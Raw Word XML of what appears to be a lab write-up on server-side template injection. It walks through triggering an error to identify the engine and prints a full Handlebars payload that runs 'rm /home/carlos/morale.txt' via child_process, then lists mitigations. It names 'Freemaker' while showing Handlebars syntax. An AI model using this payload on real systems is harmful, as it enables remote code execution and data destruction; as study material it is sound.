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66BBC347" w:rsidR="00FC6492" w:rsidRPr="00225963" w:rsidRDefault="00171838" w:rsidP="00F7137B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application is vulnerable to </w:t>
      </w:r>
      <w:r w:rsidRPr="00171838">
        <w:t xml:space="preserve">server-side template injection </w:t>
      </w:r>
      <w:r w:rsidR="00AA658B" w:rsidRPr="00AA658B">
        <w:t xml:space="preserve">due to the way it unsafely uses a </w:t>
      </w:r>
      <w:r w:rsidR="001F0747">
        <w:t>template</w:t>
      </w:r>
      <w:r w:rsidRPr="00171838">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> We will try to figure out </w:t>
      </w:r>
      <w:r w:rsidR="00680A4C">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>way to</w:t>
      </w:r>
      <w:r w:rsidR="00B4203D">
        <w:t xml:space="preserve"> know the template used</w:t>
      </w:r>
      <w:r w:rsidR="00680A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD1766">
        <w:t xml:space="preserve">in order </w:t>
      </w:r>
      <w:r w:rsidR="00680A4C">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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5456FF78"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and </w:t>
      </w:r>
      <w:r w:rsidR="00457391">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>try clicking on the very first product and we see a message that it is out of stock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194FC8B9" w14:textId="206D2D2D" w:rsidR="00515320" w:rsidRDefault="00C42FB6"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w:t>
      </w:r>
      <w:r w:rsidR="007F3E5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ow in the URL we will inject Payload 1 in order to force the application to throw an exception so we can identify the template engine of the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97E9C3" w14:textId="2EBDD907" w:rsidR="00B77FC1" w:rsidRDefault="004141C8"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8E1E0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">s we know the template engine deployed at the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008E1E0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008E1E0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> we will now craft a Payload 2 and then append it into the </w:t>
      </w:r>
      <w:r w:rsidR="00A51604">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>URL of the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC5CDA" w14:textId="04E7D048" w:rsidR="00A37030" w:rsidRPr="00C0127E" w:rsidRDefault="00A3703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So, we will try to inject </w:t>
      </w:r>
      <w:r w:rsidR="00B77FC1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload into </w:t>
      </w:r>
      <w:r w:rsidR="008E1E0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">the URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>in order to do Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidR="00606E0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> by going through the documentation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C3A4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Freemaker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C3A4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00606E0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>template engine</w:t>
      </w:r>
      <w:r w:rsidR="00BC1DDE">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A6A9A6D" w14:textId="7C5682B9" w:rsidR="00FC6492" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>{{2*2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8CCA40" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>wrtz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>{#with "s" as |string|}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3037BD10" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  {{#with "e"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655CD10C" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {{#with split as |</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conslist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>|}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CCA914" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>this.pop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7F3770" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this.push</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (lookup </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>string.sub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "constructor")}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7E8EFD" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>this.pop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B406ECE" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {{#with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>string.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as |</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>codelist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>|}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7A814" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        {{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>this.pop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F27FFE7" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        {{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this.push</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "return require('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>child_process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>').exec('rm /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/morale.txt');"}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C910555" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        {{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>this.pop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32863B23" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        {{#each </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conslist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62977C76" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          {{#with (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>string.sub.apply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>codelist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688EB765" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            {{this}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461E998C" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          {{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF5735E" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        {{/each}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49579904" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40960D50" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57898E41" w14:textId="77777777" w:rsidR="00E777EC" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  {{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215D73D3" w14:textId="5323256F" w:rsidR="00E777EC" w:rsidRPr="00AC1126" w:rsidRDefault="00E777EC" w:rsidP="00E777EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>{{/with}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD5E2D" w14:textId="77777777" w:rsidR="006C3A4A" w:rsidRDefault="006C3A4A"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3F9C7BB"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Avoid Direct Template Execution:</w:t>
      </w:r>
      <w:r w:rsidRPr="008960C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> The safest way to prevent server-side template injection is to never allow user-controlled data to dictate template content. Instead of using templates to generate dynamic content based on user input, use safer methods, such as setting content dynamically via the Document Object Model (DOM) on the client side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6070284C"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Safe API Methods:</w:t>
      </w:r>
      <w:r w:rsidRPr="008960C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the template engine you're using offers both safe and unsafe methods, always opt for the safe one. Unsafe methods often provide more flexibility, but at the cost of security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C6E3DE"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Input Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="008960C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement strict validation for all user-supplied data before processing. Regular expressions can be helpful in determining if input data matches expected patterns. Reject any input that doesn't strictly match expected patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E20A9F1"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 xml:space="preserve">Output Encoding: </w:t>
      </w:r>
      <w:r w:rsidRPr="008960C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>When displaying user-controlled data, always encode the output to make it safe for the context in which it's being placed. This can prevent injected templates from being processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76246AC6"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Use a Content Security Policy (CSP):</w:t>
      </w:r>
      <w:r w:rsidRPr="008960C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> A strong CSP can prevent many client-side injection attacks, including certain types of template injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D3195B" w14:textId="4B6DCD81" w:rsidR="004672CC" w:rsidRPr="008960C0" w:rsidRDefault="008960C0" w:rsidP="003763AA">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Disable Unneeded Features:</w:t>
      </w:r>
      <w:r w:rsidRPr="008960C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Many template engines come with a wide range of features, not all of which may be needed for your application. By disabling unnecessary features, you can reduce the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004672CC" w:rsidRPr="008960C0"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41AB6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAE27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747E9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C052C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0D79F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77988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E565C3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4BC4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1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="250045273">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="428746037">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="46537140">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1438872559">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="156718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0F7C91"/>
    <w:rsid w:val="00154660"/>
    <w:rsid w:val="0016154F"/>
    <w:rsid w:val="00171838"/>
    <w:rsid w:val="001A1AFA"/>
    <w:rsid w:val="001B7626"/>
    <w:rsid w:val="001F0747"/>
    <w:rsid w:val="00225963"/>
    <w:rsid w:val="002D6EB9"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003345FC"/>
    <w:rsid w:val="004141C8"/>
    <w:rsid w:val="00457391"/>
    <w:rsid w:val="004672CC"/>
    <w:rsid w:val="00492597"/>
    <w:rsid w:val="00495EBF"/>
    <w:rsid w:val="004C1BDC"/>
    <w:rsid w:val="00515320"/>
    <w:rsid w:val="00606E0F"/>
    <w:rsid w:val="00630358"/>
    <w:rsid w:val="00680A4C"/>
    <w:rsid w:val="006B4F81"/>
    <w:rsid w:val="006C3A4A"/>
    <w:rsid w:val="006E698E"/>
    <w:rsid w:val="007536F8"/>
    <w:rsid w:val="00757575"/>
    <w:rsid w:val="00775A2F"/>
    <w:rsid w:val="007E1804"/>
    <w:rsid w:val="007F3E5F"/>
    <w:rsid w:val="008725D7"/>
    <w:rsid w:val="0089410F"/>
    <w:rsid w:val="008960C0"/>
    <w:rsid w:val="008E1E0A"/>
    <w:rsid w:val="00A16C9E"/>
    <w:rsid w:val="00A37030"/>
    <w:rsid w:val="00A51604"/>
    <w:rsid w:val="00A539D1"/>
    <w:rsid w:val="00A649D2"/>
    <w:rsid w:val="00A867EA"/>
    <w:rsid w:val="00AA658B"/>
    <w:rsid w:val="00AC1126"/>
    <w:rsid w:val="00AF195D"/>
    <w:rsid w:val="00B03C93"/>
    <w:rsid w:val="00B4203D"/>
    <w:rsid w:val="00B77FC1"/>
    <w:rsid w:val="00BC1DDE"/>
    <w:rsid w:val="00C0127E"/>
    <w:rsid w:val="00C42FB6"/>
    <w:rsid w:val="00C92F85"/>
    <w:rsid w:val="00CC1CEA"/>
    <w:rsid w:val="00CD60CE"/>
    <w:rsid w:val="00E50DCE"/>
    <w:rsid w:val="00E777EC"/>
    <w:rsid w:val="00F244EC"/>
    <w:rsid w:val="00F3707B"/>
    <w:rsid w:val="00F568DE"/>
    <w:rsid w:val="00F57518"/>
    <w:rsid w:val="00F7137B"/>
    <w:rsid w:val="00FC6492"/>
    <w:rsid w:val="00FC6973"/>
    <w:rsid w:val="00FD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3270">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="142908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12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-27T08:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T10:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>